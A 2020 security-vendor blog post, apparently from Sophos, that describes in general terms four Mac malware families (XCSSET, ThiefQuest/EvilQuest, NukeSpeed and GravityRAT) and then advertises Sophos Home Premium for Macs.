Macs Under Threat – Four Mac Malware Variants to Watch Out For

November 27th, 2020
Macs Under Threat

“Macs are safe from malware attacks.”
“Macs are immune to malware threats.”
“What? A malware attack? You must be kidding! My Mac’s super safe.”
“Really? Macs can aren’t immune to a virus attack?”

Yes, most Mac users believe, and wrongly so, that their operating system is invulnerable to a malware attack. The reality is that Macs aren’t as invulnerable as so many believe. As a Mac user, it’s wise to take necessary security precautions so as to not fall prey to misplaced optimism.

The “myth” about Mac impenetrability

There was a time in the not too distant past when ‘threats per endpoint’ for Windows outpaced those for Mac. Macs are considered safer because of the tight control Apple traditionally exercises over their hardware, and that control has an impact on data privacy. Also, there is a range of built-in tools that help keep malware at bay in Macs. So, is the confidence about Mac’s ability to protect against all malware justified?


That’s the straight answer. The threats against your Mac are increasing day by day. Malware is constantly evolving, and couple that with an ever-increasing attack surface as Macs grow more common and you have a scenario where even the best security can be breached.

In fact, more and more reports are showing irrefutable evidence that Mac threats have surged ahead of Windows.

Read on to get the low down on a few ransomware variants that are attacking Mac systems with gusto.

Mac ransomware variants

1. XCSSET – A trojan that plays hide and seek

The XCSSET trojan means business.

If you are a Mac developer and using Xcode to build apps for Mac, you must keep an eye out for this trojan. It hides deep within an Xcode project to infect it. The trojan then runs a malicious code, which installs XCSSET on your system. This begins its process of systematically creating havoc by taking charge of the user’s browser and accessing sensitive personal data, including financial information, saved accounts passwords, all manner of saved payment information.

We know the question you will be asking: I’m not a developer and this trojan is targets developers, so why should I be concerned? The issue is there might come a day when you download an open source app that is distributed as a buildable Xcode project. If this project is infected, your system gets infected too.

2. ThiefQuest or EvilQuest – the name says it all

This ransomware targeting Macs is as sinister as they come. Apart from having true blue ransomware capabilities, it goes further down the rabbit hole and acts as a spyware. This malware not only steals files, but also hunts for passwords and data relating to cryptocurrency wallets.

If that’s not enough, it also runs an extremely capable keylogger that will record your keystrokes as you type, stealing passwords

and financial information. You blissfully enter your credit card numbers and more, completely unaware that your information is being recorded. An even more insidious component: it lurks patiently in the infected computer even after a reboot, to launch the second stage of the attack as needed. It doesn’t allow you to rest easy.

It’s not just ransomware attack is a sucker punch. It has the ability to keep on punching until the attacker has drained all information out of your system.

3. NukeSpeed – Do You Smell a RAT?

This malware is a remote access trojan (RAT), and investigations have linked it to North Korea. It uses encryption tactics that make it difficult to analyze and takes actions to hide itself. It also infects the computer by installing as a service, or by inserting itself in the Run registry key. Once your computer is infected, it provides control of your system to the attackers. You will likely not even be aware of the change, but once it starts its nefarious play within your system, it will start creating processes as another user, stop processes, read/write/remove files… and it’s just getting started.

4. GravityRAT – Now on Macs!

No, that’s not an advertisement. This one has earned widespread notoriety for infecting Windows PCs, but is now attacking Macs as well. Like all other RATs, this one also poses as a legitimate app, and once it accesses your system, it proceeds to provide remote access to the attacker. It’s among the pantheon of the ‘worst of the worst’ because it’s been used against military targets as well as home machines. It delivers system information to the attacker, searches files based on a range of file extensions, takes screenshots, records audio, and basically does everything that is expected from a spyware. It uses stolen developer signatures to bypass Apple’s strict security protocols that ensure only legitimate apps are made available to Mac users.

Malware protection an absolute must on your Macs

With the popularity of Macs growing every day, those devices are now in hackers’ the crosshairs. The threat always existed, but is much more prevalent now. As malware becomes more sophisticated, you need advanced malware protection to keep up.

One thing is for certain: Mac users need a cybersecurity a solution.

That solution should offer comprehensive protection specifically configured for Macs. Sophos Home Premium for Macs is the ideal security solution with its award-winning antivirus, powerful ransomware protection and a range of advanced techniques that will keep complex threats away.

Be sure to keep your Mac protected from advanced malware at all times.

What are you waiting for? Let's get started!

Free Download
No credit card required